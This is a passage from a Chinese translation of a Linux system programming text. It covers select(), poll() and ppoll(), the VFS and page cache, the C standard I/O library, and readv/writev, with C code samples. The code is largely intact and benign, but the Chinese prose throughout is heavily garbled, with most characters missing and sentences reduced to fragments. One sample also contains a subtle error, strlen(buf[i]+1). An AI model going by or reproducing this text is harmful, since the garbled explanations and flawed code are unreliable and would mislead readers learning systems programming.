#include <sys/types.h>
#include <unistd.h>
#define TIMEOUT 5 /* select timeout in seconds */
#define BUF_LEN 1024 /* read buffer in bytes */
int main (void)
{
struct timeval tv;
fd_set readfds;
int ret;
/* Wait on stdin for input. */
FD_ZERO(&readfds);
FD_SET(STDIN_FILENO, &readfds);
/* Wait up to five seconds. */
tv.tv_sec = TIMEOUT;
tv.tv_usec = 0;
/* All right, now block! */
ret = select (STDIN_FILENO + 1,
&readfds,
NULL,
NULL,
– 53 –
2
文件 I/O
&tv);
if (ret == -1) {
perror (”select”);
return 1;
} else if (!ret) {
printf (”%d seconds elapsed.\n”, TIMEOUT);
return 0;
}
/*
* Is our file descriptor ready to read?
* (It must be, as it was the only fd that
* we provided and the call returned
* nonzero, but we will humor ourselves.)
*/
if (FD_ISSET(STDIN_FILENO, &readfds)) {
char buf[BUF_LEN+1];
int len;
/* guaranteed to not block */
len = read (STDIN_FILENO, buf, BUF_LEN);
if (len == -1) {
perror (”read”);
return 1;
}
if (len) {
buf[len] = ’\0’;
printf (”read: %s\n”, buf);
}
return 0;
}
fprintf (stderr, ”This should not happen!\n”);
– 54 –
2
文件 I/O
return 1;
}
2.10.2.2 用 select() 实现可移植的 sleep()
select() Unix 实相对的
将 select() 的的。方将
集设空 (NULL), 将超时设空 (non-NULL) 实。
struct timeval tv;
tv.tv_sec = 0;
tv.tv_usec = 500;
/* sleep for 500 microseconds */
select (0, NULL, NULL, NULL, &tv);
然 Linux 提的的实内我们将
。
2.10.2.3 pselect()
4.2BSD 的 select() POSIX 自的方
pselect() POSIX 1003.1g-2000 的 POSIX 1003.1-2001 对 pselect()
#define _XOPEN_SOURCE 600
#include <sys/select.h>
int pselect (int n,
fd_set *readfds,
fd_set *writefds,
fd_set *exceptfds,
const struct timespec *timeout,
const sigset_t *sigmask);
– 55 –
2
文件 I/O
FD_CLR(int fd, fd_set *set);
FD_ISSET(int fd, fd_set *set);
FD_SET(int fd, fd_set *set);
FD_ZERO(fd_set *set);
pselect() select() 同
1. pselect() 的 timeout timespec timeval 。 time-
spec 理上更。实上
上。
2. pselect() 调 timeout 。调时
新。
3. select() 调 sigmask 。设零时 pselect() 的
同 select()。
timespec 式
#include <sys/time.h>
struct timespec {
long tv_sec; /* seconds */
long tv_nsec; /* nanoseconds */
};
pselect() Unix 工的原 sigmask 以
文件间的件(。设
处理程设(处理程进程
调 select() 。调间
能。 pselect() 提的
以。的处理。 pselect()
内的。。
2.6.16 内 Linux 实的 pselect() 调 glibc
提的单的对 select() 的。方件出的小
。真调。
pselect() (相对的进 se-
lect()出性。
– 56 –
2
文件 I/O
2.10.3 poll()
poll() 调 System V 的 I/O 方。 select()
的 select() (出性的
#include <sys/poll.h>
int poll (struct pollfd *fds, unsigned int nfds,
int timeout);
select() 的的文件集同 poll()
单的 nfds pollfd 的 fds 。
#include <sys/poll.h>
struct pollfd {
int fd; /* file descriptor */
short events; /* requested events to watch */
short revents; /* returned events witnessed */
};
pollfd 单的文件。以,
poll() 文件。的 events 段的文件
件的。设段。 revents 段文件上
的件的。内时设段。 events 段的件
能 revents 段。的件
POLLIN
读。
POLLRDNORM 读。
POLLRDBAND
读。
POLLPRI
读。
POLLOUT
写操作。
POLLWRNORM 写。
POLLBAND
写。
POLLMSG
SIGPOLL 。
– 57 –
2
文件 I/O
件能 revents
POLLER
给出文件上。
POLLHUP
文件上件。
POLLNVAL 给出的文件。
events 时。 poll() select()
异。
POLLIN | POLLPRI select() 的读件 POLLOUT | POLLWRBAND
select() 的写件。 POLLIN POLLRDNORM | POLLRDBAND
POLLOUT POLLWRNORM。
文件读写我们设 events POLLIN
| POLLOUT。 时我 们 将 revents 相 的 。 设
POLLIN文件能读。设 POLLOUT文件
能写。相以设示以文
件上读写。
timeout 何 I/O 时间的以。
示。零示调即出备的 I/O
何件。 poll() 同即。
2.10.3.1 返回值和错误码
时 poll() 零 revents 段的文件。超时
何件零。时 -1 errno 设
EBADF
或更的文件。
EFAULT
fds 的超出进程空间。
EINTR
件以新调。
EINVAL
nfds 超 RLIMIT NOFILE 。
ENOMEM 的内存。
2.10.3.2 poll() 的例子
我们 poll() 的程同时 stdin 读 stdout
写:
#include <stdio.h>
– 58 –
2
文件 I/O
#include <unistd.h>
#include <sys/poll.h>
#define TIMEOUT 5 /* poll timeout, in seconds */
int main (void)
{
struct pollfd fds[2];
int ret;
/* watch stdin for input */
fds[0].fd = STDIN_FILENO;
fds[0].events = POLLIN;
/* watch stdout for ability to write (almost
always true) */
fds[1].fd = STDOUT_FILENO;
fds[1].events = POLLOUT;
/* All set, block! */
ret = poll (fds, 2, TIMEOUT * 1000);
if (ret == -1) {
perror (”poll”);
return 1;
}
if (!ret) {
printf (”%d seconds elapsed.\n”, TIMEOUT);
return 0;
}
if (fds[0].revents & POLLIN)
printf (”stdin is readable\n”);
– 59 –
2
文件 I/O
if (fds[1].revents & POLLOUT)
printf (”stdout is writable\n”);
return 0;
}
我们的
$ ./poll
stdout is writable
将文件我们件
$ ./poll < ode_to_my_parrot.txt
stdin is readable
stdout is writable
设我们 poll()我们调时新
pollfd 。相同的能时内 revents 段
空。
2.10.3.3 ppoll()
Linux 提 poll() 的调 ppoll()。 ppoll( pselect() 同
然 pselect() 同的 ppoll() Linux 的调
#define _GNU_SOURCE
#include <sys/poll.h>
int ppoll (struct pollfd *fds,
nfds_t nfds,
const struct timespec *timeout,
const sigset_t *sigmask);
– 60 –
2
文件 I/O
pselect() timeout 以时 sigmask
提处理的。
2.10.4 poll() 与 select()
们的工作 poll() 调然 select()
• poll() 的文件。
• poll() 对的文件时更效率。 select()
900 的文件内集的
。
• select() 的文件集小的以作出集
小 select() 以的文件的效率
。能集的时对的操作效率
。∗ poll() 以小的。或
。
• select()文件集时新的
调新们。 poll() 调离(events 段
出(revents 段即。
• select() 的 timeout 时的。的新
。然 pselect() 。
select() 调的的方
• poll() Unix poll()以 select() 的性更。
• select() 提更的超时方。 ppoll() pselect() 理
上提的实何调以的提
的。
poll() select() 更的 epoll Linux 的 I/O
方我们将。
2.11 内核内幕
Linux 内何实 I/O 的集的内子
文件(VFS页存页写。子 Linux 的 I/O
∗的的以零操作时
对进。然工作的。
– 61 –
2
文件 I/O
更效。
我们将子 I/O 调。
2.11.1 虚拟文件系统
文件 (时 virtual file switch) Linux 内
的文件操作的。内文件
的文件操作文件。
VFS 实的方文件 (common file model)
Linux 文件的。对方∗文件
提 Linux 内文件的。 VFS 对文件
。提子读同步以及能。文
件的处理相操作。
方文件间的性。子 VFS 工作
inode superblock 上。 Unix 的文件能 Unix 的
inodes处理。实 Linux 以的
FAT NTFS 的文件。
VFS 的处。单的调以上的文件
上读单的工以文件上。文件
同的同的同的调。工作工
作。
read() 调段的程。 C 提
调的调的。空间
进程内调处理处理给 read() 调内
文件对的对。然内调相对的 read()
。对文件文件的。然
工作文件读给空间的
read() 调调空间的调处理然将
空间 read() 调进程。
对程 VFS 的的。程文件的
文件或。调 read() write()以及能
的文件上操作文件。
∗的 C 。
– 62 –
2
文件 I/O
2.11.2 页缓存
页存内存存文件上的的方
式。相对的处理。内存存
内对相同的以内存读
。
页存性(locality of reference的方时间
性 (temporal locality)方能。
时的内存时存的
页存内文件的的。存时内
调存子读。读读
页存存给。读
存。页存的操作的的相
效的。
Linux 页存小的。 I/O 操作将的内存页
存空的内存。页存实的空
内存新的存出页存的
页将空间给真的内存。处理自进的。
的存 Linux 的内存存能的。
的页存的
能将读的更(内上存
的 RAM 更的内存空间。 Linux 内实
理页存(以及存的式方。式方能
理页存的时。
存间的以 /proc/sys/vm/swappiness 调。文件
以 0 100 间 60。的示内存页存
的示更理页存进。
性(locality of reference的式空间性 (sequential
locality)的的性。原理内实页存
读。读读时读更的页存的
作读效。内读时读
。读的时以
– 63 –
2
文件 I/O
效。内以进程操作读时读。
的进程对的提新的读内以
I/O 将读。
页存内理读的。进程
读的内读读进更的。读
小 16KB 128KB。内读何的
文件的读以
读。
页存的存对程的。程
以页存更处 (空间实
存。的效率的以页存。方
读。然文件 I/O 。
2.11.3 页回写
write() 的的内写操
作。进程写进将
” ” 的内存的上的新。时写以
。对同新的写更新新。文件
的写新的。
” ” 写将文件内存同步。
的写。以件写
• 空内存小设的时的写上理
的能内存空间。
• 的超设的时写。以
的性。
写 pdflush 的内程操作(能 page dirty flush
。以上出时 pdflush 程
将的提件满。
能同时 pdflush 程写。更的性
。设备进写操作时的写
操作。自设备存 pdflush 程
设备。以内的处的 pdflush
– 64 –
2
文件 I/O
程(bdflush单程能的时间设备
同时设备处空。上 Linux 内以
。
内 buffer head 示。
的的的。同时
实的。存页存。的方式将
子页存。
Linux 内 2.4 子页存离
的同时页存存。以同时
存(作的页存(存存。自然的同步
存时间。 2.4 Linux 内的的页存
的进。
Linux 的写子以写操作
时出的。性以同步
I/O(。
2.12 结论
Linux 程的文件 I/O。 Linux
文件的操作何读写文件的。
操作的 Unix 方式及。
集处理 I/O以及 C 的 I/O 。 C
出方空间的 I/O 提的性能提。
– 65 –
3
出
第 3 章
缓冲输入输出
我们的的文件的 I/O
的 - 的操作进的。以小
对时 I/O 效率理的。
操作效率调的。读读
1024 读 1024 相然效率更。 bolck 的
即以的进的操作效率理
的。的小 1K, 以 1130 的操作 1024 的
。
3.1 用户-缓冲 I/O
对文件 I/O 的程 I/O。
I/O 空间内的以程设
以调。的出性能方的内
写操作相 I/O 读操作。同的方
的提操作效率。
以空间程 dd
dd bs=1 count=2097152 if=/dev/zero of=pirate
bs=1, 进 2 097 152 操作 () 文件
/dev/zero(提的 0 文件的设备) 2M 文件 pirate 。
文件的程 2 的读写操作。
相同的 2M 1024 的:
dd bs=1024 count=2048 if=/dev/zero of=pirate
操作相同的 2M 内相同的文件 1024 读
写操作。 3 1 的效率提的。
小上的 dd 的时间(同的
。实时间的时时间时间空间程
的时间时间进程内调的时间。
– 66 –
3
出
3-1. 小对性能的
Block size
Real time
User time
System time
1 byte
18.707 seconds
1.118 seconds
17.549 seconds
1,024 bytes
0.025 seconds
0.002 seconds
0.023 seconds
1,130 bytes
0.035 seconds
0.002 seconds
0.027 second
1024 小进操作 1 相的性能提
。示更的小(的调
小小的效率。即
更的调 1130 的对的操作 1024 的
效率更。
性能的理小。式的
小能 1024 1024 的或 1024 的。
/dev/zero 的小实上 4096B。
3.1.1 块大小
实小 512 1024 2048 或 4096
。 3 1 示效率的提将操作的设
小或的。内件间的。
以小或能能的对
的以的内操作。
调 stat()(我们将) 或 stat(1) 以设备的
小。实上我们的小.
I/O 操作小的 1130
的。 Unix 的上 1130 的的小
操作 I/O 对。小的或以对的
。的小操作对, 效率。的
调。
然, 单的方小小的
I/O。 4096 或 8192 的效.
程以单进操作. 程以, , 单
单进操作的。, , 程
I/O. 写时, 存程空间的。
– 67 –
3
出
给的(小时操作写
出。同理读操作读小对的。程对
的读时的给出。空时
的对的读。的小设将的效率
提。
以程实。实上实
的。然程 I/O (C 的)以提
能的方。
3.1.2 标准 I/O
C 提 I/O (单作 stdio)实
的方。 I/O 单能。程
( FORTAN) 同, C
对能提内然对 I/O 的内。 C
的展们提能的处理、
、时间以及 I/O 。程 ANSI C 的
(C89) C 。然 C95 C99
新的 I/O 1989 的时相。
的 I/O。属文件出 C
实、、读写文件 C 。程
I/O 或自的调
设程的能。
C 给实的相实
扩展的性。的 Linux 上的
glibc 实的。 Linux 离的时我
们以。
3.1.3 文件指针
I/O 程操作文件。的们自的
即的文件 (file pointer)。 C 文件映射
文件。文件 FILE 的示 FILE <stdio.h>
。
– 68 –
3
出
I/O , 的文件” ”(stream)。以读 (
), 写 (出), 或 (出)。
3.2 打开文件
文件 fopen() 以读写操作:
#include <stdio.h>
FILE* fopen(const char * path, const char * mode);
的式文件 path, 新的。
3.2.1 模式
式 mode 以的方式文件。以
:
r
文件读。文件的处。
r+
文件读写。文件的处。
w
文件写, 文件存, 文件空。文件存,
。文件的处。
w+
文件读写。文件存, 文件空。文件存,
。设文件的。
a
文件式的写。文件存。设文件
的。的写文件。
a+
文件式的读写。文件存。设文
件的。的写文件。
– 69 –
3
出
给的式能 b, Linux 。操作
同的方式对文进文件, b 式示文件进。
Linux, 的性的操作, 以相同的方式对文进文
件。
时,fopen() 的 FILE 。时, NULL, 相
的设 errno。
, 的 /etc/manifest 以读, 将:
FILE *stream;
stream = fopen (”/etc/manifest”, ”r”);
if (!stream)
/* error */
3.2.2 通过文件描述符打开文件
fdopen() 将的文件 (fd) :
#include <stdio.h>
FILE * fdopen (int fd, const char *mode);
fdopen() 的能式 fopen() , 原文件的式
。以式 w w+, 们文件。的设文件
的文件。文件, 文
件上进 I/O(的。的文件
, 新的。相的文件。
时,fdoepn() 的文件; 时, NULL。, 的
open() 调 /home/kidd/map.txt, 然的文件
的:
FILE *stream;
int fd;
fd = open (”/home/kidd/map.txt”, O_RDONLY);
if (fd == −1)
/* error */
stream = fdopen (fd, ”r”);
– 70 –
3
出
if (!stream)
/* error */
3.3 关闭流
fclose() 给的
#include <stdio.h>
int fclose (FILE *stream);
写出的写出。时 fclose()
0。时 EOF 相的设 errno。
3.3.1 关闭所有的流
fcloseall() 的进程相的
出
#define _GNU_SOURCE
#include <stdio.h>
int fcloseall (void);
的的写出。 0 Linux
的。
3.4 从流中读取数据
C 实读的方。
的单的读单的读进读。读
以的方式何 w 或 a 的式以。
3.4.1 单字节读取
理的出式单读。 fgetc() 以
读单
#include <stdio.h>
– 71 –
3
出
int fgetc (FILE *stream);
读 int 。
的示文件: EOF 。
fgetc() 的以 int 存。存 char
的。的子读单然以方式
int c;
c = fgetc (stream);
if (c == EOF)
/* error */
else
printf (”c=%c\n”, (char) c);
stream 的以读式。
3.4.2 把字符回放入流中
出提将的。
的以。
#include <stdio.h>
int ungetc (int c, FILE *stream);
调 c 。时 c; 时
EOF。读 c。们以的
方式的。 POSIX 出间读时
能。然实。的内存
Linux 的。然。
调 ungetc() 读
(’ ’) 的调的。
进程的程实的的程。
3.4.3 按行的读取
fgets() 给的读:
– 72 –
3
出
#include <stdio.h>
char * fgets (char *str, int size, FILE *stream);
读 size 1 的存 str 。
读时空存。读 EOF 或时读。
读’\n’ 存 str。
时 str时 NULL。
char buf[LINE_MAX];
if (!fgets (buf, LINE_MAX, stream))
/* error */
POSIX <limits.h> LINE MAX POSIX 能
处理的的。 linux 的 C 提的 (以
), 能 LINE MAX 。程以 LINE MAX
linux 设的相对。对 linux 的程
小的。
3.4.4 读取任意字符串
fgets() 的读的。时。时
。时
。的
存的。
fgetc() 写 fgets() 。的段读 n-1
str 然上’\0’
char *s;
int c;
s = str;
while (--n > 0 && (c = fgetc (stream)) != EOF)
*s++ = c;
*s = ’\0’;
– 73 –
3
出
段程以扩展的 d 处 ( d 能空
)
char *s;
int c = 0;
s = str;
while (--n > 0 && (c = fgetc (stream)) != EOF &&
(*s++ = c) != d)
;
if (c == d)
*--s = ’\0’;
else
*s = ’\0’;
存, 将 d 设’\n’ 以提 fgets() 的
能。
fgets() 的实实方式能调
fgetc()。然我们的 dd 子同。然段出的
调进的调 dd 程 bs 1 的对 I/O
, 相对更的。
3.4.5 读取二进制文件
程读。时读写的进
C 的。出提 fread():
#include <stdio.h>
size_t fread (void *buf, size_t size, size_t nr,
FILE *stream);
调 fread() 读 nr size 将
buf 的。文件读出的。
读的(读的!。
nr 小的读或文件。的 ferror() feof()(
– 74 –
3
出
” 文件”的能的。
小对 的 同 程 写 的 进 文
件对程能读的即程上的
能读的。
fread() 单的子给读性小的
char buf[64];
size_t nr;
nr = fread (buf, sizeof(buf), 1, stream);
if (nr == 0)
/* error */
我们 fread() 相对的 fwrite() 时我们更的子。
3.5 向流中写数据
读相同 C 将写的。
我们的写的方单的写写
进写。同的写方对 I/O 的。写
以的出的式 r 的的式。
3.5.1 对齐的讨论
的设对的。程内存单
的。处理以小对内存进读写。相处理以
的 ( 2 4 8 或 16 ) 内存。处理的空间
0 进程的读。 C 的存
对的。的自对的的 C
小相的对。 32 以 4 对。
int 存能 4 的内存。对的同的
上同程的性能。处理能对的
性能。的处理能对的
件异。更的处理对
的的。自对对
– 75 –
3
出
程的。处理内存理存进
进时对。程
方。更的对的内。
3.5.2 写入单个字符
fgetc() 相对的 fputc():
#include <stdio.h>
int fputc (int c, FILE *stream);
fputc() 将 c 示的 () 写 stream 的
。时 c。 EOF相的设 errno。
单
if (fputc (’p’, stream) == EOF)
/* error */
子将 p 写写。
3.5.3 写入字符串
fputs() 给的写的
#include <stdio.h>
int fputs (const char *str, FILE *stream);
fputs() 的调将 str 的的写 stream 的
。时 fputs() 。时 EOF。
的子以式文件写将给的写相的
然
stream = fopen (”journal.txt”, ”a”);
if (!stream)
/* error */
if (fputs (”The ship is made of wood.\n”, stream)
== EOF)
/* error */
– 76 –
3
出
if (fclose (stream) == EOF)
/* error */
3.5.4 写入二进制数据
程写进单能满。
存进 C I/O 提 fwrite() :
#include <stdio.h>
size_t fwrite (void *buf,
size_t size,
size_t nr,
FILE *stream);
调 fwrite() buf 的 nr 写 stream
size。文件写的的。
时写的 (的!)。小 nr 的
。
3.5.5 缓冲 I/O 示例程序
我们子实上的程
及的。程 pirate然
的。程的文件 dada 的
出将写。同的程 data 读存
pirate 的实。程的内出出:
#include <stdio.h>
int main (void)
{
FILE *in, *out;
struct pirate
{
char name[100]; /* real name */
unsigned long booty; /* in pounds sterling */
– 77 –
3
出
unsigned int beard_len; /* in inches */
} p, blackbeard = { ”Edward Teach”, 950, 48 };
out = fopen (”data”, ”w”);
if (!out)
{
perror (”fopen”);
return 1;
}
if (!fwrite (&blackbeard, sizeof (struct
pirate), 1, out))
{
perror (”fwrite”);
return 1;
}
if (fclose (out))
{
perror (”fclose”);
return 1;
}
in = fopen (”data”, ”r”);
if (!in)
{
perror (”fopen”);
return 1;
}
if (!fread (&p, sizeof (struct pirate), 1, in))
{
perror (”fread”);
return 1;
}
if (fclose (in))
– 78 –
3
出
{
perror (”fclose”);
return 1;
}
printf (”name=\”%s\” booty=%lu beard_len=%u\n”,
p.name, p.booty, p.beard_len);
return 0;
}
出然原的:
name=”Edward Teach” booty=950 beard_len=48
我们的、对的同程写的
进对程能读的。同的程即
同上的同程能能读 fwrite() 写的。我们的
子以的小或的
将。东能 ABI 的上能相
同。
3.6 定位流
的的。能程读的
的文件。的时能将设文件的
。 I/O 提能调 lseek() 的
()。 fseek() I/O 的操文件
offset whence 的:
#include <stdio.h>
int fseek (FILE *stream, long offset, int whence);
whence 设 SEEK SET, 文 件 的 设 offset 处。
whence 设 SEEK CUR, 文件设上 offset. whence
设 SEEK END, 文件设文件上 offset。
时,fseek() 0空文件 ungetc() 操作。
时 1相的设 errno。的 (EBADF)
– 79 –
3
出
whence (EINVAL)。 I/O 提 fsetpos() :
#include <stdio.h>
int fsetpos (FILE *stream, fpos_t *pos);
将的设 pos 处。将 whence 设 SEEK SET 时
的 fseek() 能。时 0。 -1, 相设 errno 的
。 (将的对的 fgetpos() ) ( UNIX) 能
示的的上提。上能
将设的方的能。 linux 的程
们能的上。
I/O 提 rewind() 段
#include <stdio.h>
void rewind (FILE *stream)、;
调
rewind(stream);
将的。:
fseek (stream, 0, SEEK_SET);
空。 rewind() 能提
。调调空 errno
调零。
errno = 0;
rewind (stream);
if (errno)
/* error */
3.6.1 获得当前流位置
lseek() 同 fseek() 更新的。单的提
能。 ftell() 的:
– 80 –
3
出
#include <stdio.h>
long ftell (FILE *stream);
时 -1相的设 errno。性的出提
fgetpos()
#include <stdioh.h>
int fgetpos (FILE *stream, fpos_t *pos);
时 fgetpos() 0将的设 pos。时
-1, 相的设 errno。 fsetpos() fgetpos() 文件
的 linux 上提。
3.7 清洗一个流
I/O 提将写内的
write() 写出的。 fflush() 提能
#include <stdio.h>
int fflush (FILE *stream);
调时 stream 的的写的 (flush)
内。 stream 空的(NULL 进程的。时
fflush() 0。时 EOF相的设 errno。
理 fflush() 的作理 C 的内
自的的。提的调的 C
的们空间内空间。效率提的原
程空间的调。
或时调。 fflush() 的
写内。效 write() 调
的。能写理的 fsync(
(同时 I/O)。更的调 fflush() , 即调 fsync():
写内然内写。
– 81 –
3
出
3.8 错误和文件结束
I/O fread(), 调的能
们提 EOF 的。调时
给的出文件。 I/O 提。
ferror() 上设
#include <stdio.h>
int ferror (FILE *stream);
的 I/O 设。设
零 0。 feof() 文件设
#include <stdio.h>
int feof (FILE *stream);
文件的时 EOF I/O 设。
设零 0。 clearerr() 空文件
#include <stdio.h>
void clearerr (FILE *stream);
(方提的
)。 error EOF 以调 clearerr()操作
的。
/* ’f’ is a valid stream */
if (ferror (f))
printf (”Error on f!\n”);
if (feof (f))
printf (”EOF on f!\n”);
clearerr (f);
– 82 –
3
出
3.9 获得关联的文件描述符
时文件方的。的 I/O
存时以的文件对调。
的文件以 fileno():
#include <stdio.h>
int fileno (FILE *stream);
时 fileno() 相的文件。时 1。
给 的 时 能 时 将 errno 设
EBADF。出调调。 fileno() 时程
操作谨。的文件
对进 (flush)。 I/O 操作。
3.10 控制缓冲
I/O 实提
小的。同的提同能同的。
。提内。对
。的。
以单。提内。对出
的。的方式 (出)。
以单。的文
件。的文件相的的。 I/O 。
的效的。然 I/O 实提
的的
#include <stdio.h>
– 83 –
3
出
int setvbuf (FILE *stream, char *buf, int mode,
size_t size);
setbuf() 设的式式以的
IONBF
IOLBF
IOFBF
IONBF buf size buf 以 size 小
的空间 I/O 对给的。 buf 空
glibc 自。
setvbuf(何操作调。时
0出零。
时的存。的
作的自作。的
main() 内的式。以
#include <stdio.h>
int main (void)
{
char buf[BUFSIZ];
/* set stdin to block-buffered with a BUFSIZ
buffer */
setvbuf (stdout, buf, _IOFBF, BUFSIZ);
printf (”Arrr!\n”);
return 0;
}
以离作式或将作
。
的操上的。
的。文件的以。的
小 <stdio.h> 的 BUFSIZ的 (
小的)。
– 84 –
3
出
3.11 线程安全
程同进程的实。程的同空
间的进程。同步或将程程以何
时间。程的操作提(相的程
程相。 I/O 。
能满。时给调将(段
的的 I/O 操作扩。能
提效率。我们。
I/O 的上程的。内实设
的的程。程何 I/O
程。或同上的程
能 I/O 操作单调的上文 I/O 操
作原子的。
然实程单的调更的原子
性。程写程能读写
间。的 I/O 操的提
的。
/** 的。程能式将的
I/O 操作程。的。
* /
3.11.1 手动文件加锁
flockfile() 然的
程然:
#include <stdio.h>
void flockfile (FILE *stream);
funlockfile() 相的
#include <stdio.h>
void funlockfile (FILE *stream);
– 85 –
3
出
0的程的程能
。调以。程以 flockfile() 调
程相同的 funlockfile() 调。 ftrylockfile()
flockfile() 的:
#include <stdio.h>
int ftrylockfile (FILE *stream);
ftrylockfile() 何处理即零
。的程
0。我们子
flockfile (stream);
fputs (”List of treasure:\n”, stream);
fputs (” (1) 500 gold coins\n”, stream);
fputs (” (2) Wonderfully ornate dishware\n”,
stream);
funlockfile (stream);
单的 fputs() 操作我们内
”List oftreasure” 的出程能程的 fputs()
间。理程的程同提 I/O 操
作。然的程单调更的
原子操作 flockfile() 的相以。
3.11.2 不加锁流操作
给原。能提更更
的以将的小提效率。 Linux 提
的的 I/O 何操作。们实
上的 I/O
#define _GNU_SOURCE
#include <stdio.h>
int fgetc_unlocked (FILE *stream);
– 86 –
3
出
char *fgets_unlocked (char *str, int size, FILE
*stream);
size_t fread_unlocked (void *buf, size_t size,
size_t nr,FILE *stream);
int fputc_unlocked (int c, FILE *stream);
int fputs_unlocked (const char *str, FILE
*stream);
size_t fwrite_unlocked (void *buf, size_t size,
size_t nr,FILE *stream);
int fflush_unlocked (FILE *stream);
int feof_unlocked (FILE *stream);
int ferror_unlocked (FILE *stream);
int fileno_unlocked (FILE *stream);
void clearerr_unlocked (FILE *stream);
们或上的相对的
相同操作。程工。
POSIX 的 I/O 上的 POSIX
的。们 Linux 的的 Unix 的以上提的
。
3.12 对标准 I/O 的批评
I/O 出的。
fgets(), 时能满。 gets(
出。
对 I/O 的的性能。读时 I/O 对内
read() 调内 I/O 。然程
I/O 读时 fgetc(
I/O 的的。写时相的方式给
的空间 I/O 然 I/O write() 写
内。
的读 I/O 的
– 87 –
3
出
。以 I/O 读的
。程实自的时能写以
。实提” ” 的程们
的读时出。
写操作更然能。写
时实备将内时写出
。以散 - 聚集 I/O(scatter-gather I/O) 的 writev() 实
能调。 (我们散布 - 聚集 I/O)。
的们我们的方
。实们自的方。
同的 I/O 然。
3.13 结论
I/O C 提的。的方
的方。 C 程实上 I/O对
的。然对 I/O理的 I/O
的的方。调 write(出写
I/O(
. 能调调
。
. 性能的的 I/O 以小进能
对。
. 的式或的实
进的调。
. 相的 Linux 调更喜的。
然的能的 Linux 调。我们将
式的 I/O 相的调。
– 88 –
4
文件 I/O
第 4 章
高级文件 I/O
我们 Linux 的 I/O 调。调文件
I/O 的 Linux 方式的。我们
I/O 调上空间空间的
方即 C 的 I/O 。我们将 Linux 提的更 I/O
调
散布 / 聚集 I/O I/O 单调同时对读或写操
作聚集同进的 I/O 操作。
epoll
poll() select() 的进程处理文件
的时。
内存映射 I/O
将文件映射内存以单的内存理方式处理文件;
的 I/O。
文件 I/O 提示
进程将文件 I/O 上的提示提给内; 能提
I/O 性能。
异步 I/O
进程出 I/O ;
程的处理 I/O 操作。
将性能内的 I/O 子。
4.1 散布 / 聚集 I/O
散布聚集 I/O 以单调操作的 I/O 方
以将单的内写或单读
。散布或聚
集。方的 I/O。相对的提的读写调
以作性 I/O。
散布 / 聚集 I/O 性 I/O 相:
更自然的处理方式 的段的(处理的文件段
I/O 提的处理方式。
效率
单 I/O 操作能性 I/O 操作。
– 89 –
4
文件 I/O
性能
调的内 I/O 性
I/O 提更的性能。
原子性
同性 I/O 操作进程以单 I/O
操作进程操作的。
我们以散布 / 聚集 I/O 更自然的 I/O 方操作
原子性。进程以写散的写以读
的散即工实空间的散布
聚集。处理效的。
4.1.1 readv() 和 writev()
Linux 实 POSIX 1003.1-2001 的散布 / 聚集的调
。 Linux 实上的性。
readv() fd 读 count segment iov 的∗
#include <sys/uio.h>
ssize_t readv (int fd, const struct iovec *iov,
int count);
writev() iov 的读 count segment 的写 fd
#include <sys/uio.h>
ssize_t writev (int fd, const struct iovec *iov,
int count);
操作 readv() writev() 的 read() write() 。
iovec 的我们段 (segment)
#include <sys/uio.h>
struct iovec {
void *iov_base;
size_t iov_len;
};
∗处的 segment iov
– 90 –
4
文件 I/O
segment 的集 (vector)。段读写的的
。 readv() 处理满的 iov len
。 writev() 处理 iov len
出。 iov[0] iov[1] iov[count-1] 处理段。
4.1.1.1 返回值
操作时 readv() writev() 读写的。
iov len 的。出时 -1设 errno。调能
何 read() write() 能的相同时 errno 设同的
。的。
ssize t iov len 的 SSIZE MAX
处理 -1 errno 设 EINVAL。
POSIX count 0小 IOV MAX(
<limits.h> 。 Linux IOV MAX 1024。 count 0
调 0。† count IOV MAX处理 -1 errno 设
EINVAL。
count
I/O 操 作 内 内 示 段 (seg-
ment)。 count 的小进的。出的的
count 小的内上段内存
性能上的提。 8以 count 小 8 时
I/O 操作以效的内存方式。
I/O 段。
小的时 8 或更小的性能的提。
4.1.1.2 writev() 示例
我们单的子 3 段段同的
的写。程以示 writev() 的能同时以
作段的段
†的 Unix count 0 时能将 errno 设 EINVAL。
的 count 0以设 EINVAL 或处理。
– 91 –
4
文件 I/O
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <sys/uio.h>
int main ()
{
struct iovec iov[3];
ssize_t nr;
int fd, i;
char *buf[] = {”The term buccaneer comes from
the word boucan.\n”, ”A boucan is a wooden
frame used for cooking meat.\n”, ”Buccaneer
is the West Indies name for a pirate.\n” };
fd = open (”buccaneer.txt”, O_WRONLY | O_CREAT
| O_TRUNC);
if (fd == -1) {
perror (”open”);
return 1;
}
/* fill out three iovec structures */
for (i = 0; i < 3; i++) {
iov[i].iov_base = buf[i];
iov[i].iov_len = strlen (buf[i]+1);
}
/* with a single call, write them all out */
nr = writev (fd, iov, 3);
if (nr == -1) {
perror (”writev”);
return 1;
}
– 92 –
4
文件 I/O
printf (”wrote %d bytes\n”, nr);
if (close (fd)) {
perror (”close”);
return 1;
}
return 0;
}
程:
$ ./writev
wrote 148 bytes
读文件内:
$ cat buccaneer.txt
The term buccaneer comes from the word boucan.
A boucan is a wooden frame used for cooking meat.
Buccaneer is the West Indies name for a pirate.
4.1.1.3 readv() 示例
我们 readv() 的文文件读。程同
单:
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/uio.h>
int main ()
{
char foo[48], bar[51], baz[49];
struct iovec iov[3];
ssize_t nr;
– 93 –
4
文件 I/O
int fd, i;
fd = open (”buccaneer.txt”, O_RDONLY);
if (fd == -1) {
perror (”open”);
return 1;
}
/* set up our iovec structures */
iov[0].iov_base = foo;
iov[0].iov_len = sizeof (foo);
iov[1].iov_base = bar;
iov[1].iov_len = sizeof (bar);
iov[2].iov_base = baz;
iov[2].iov_len = sizeof (baz);
/* read into the structures with a single call
*/
nr = readv (fd, iov, 3);
if (nr == -1) {
perror (”readv”);
return 1;
}
for (i = 0; i < 3; i++)
printf (”%d: %s”, i, (char *)
iov[i].iov_base);
if (close (fd)) {
perror (”close”);
return 1;
}
return 0;
}
上程程出
$ ./readv
– 94 –
4
文件 I/O
0: The term buccaneer comes from the word boucan.
1: A boucan is a wooden frame used for cooking meat.
2: Buccaneer is the West Indies name for a pirate.
4.1.1.4 实现
我们以空间实单的 readv() writev()的
#include <unistd.h>
#include <sys/uio.h>
ssize_t naive_writev (int fd, const struct iovec
*iov, int count)
{
ssize_t ret = 0;
int i;
for (i = 0; i < count; i++) {
ssize_t nr;
nr = write (fd, iov[i].iov_base,
iov[i].iov_len);
if (nr == -1) {
ret = -1;
break;
}
ret += nr;
}
return ret;
}
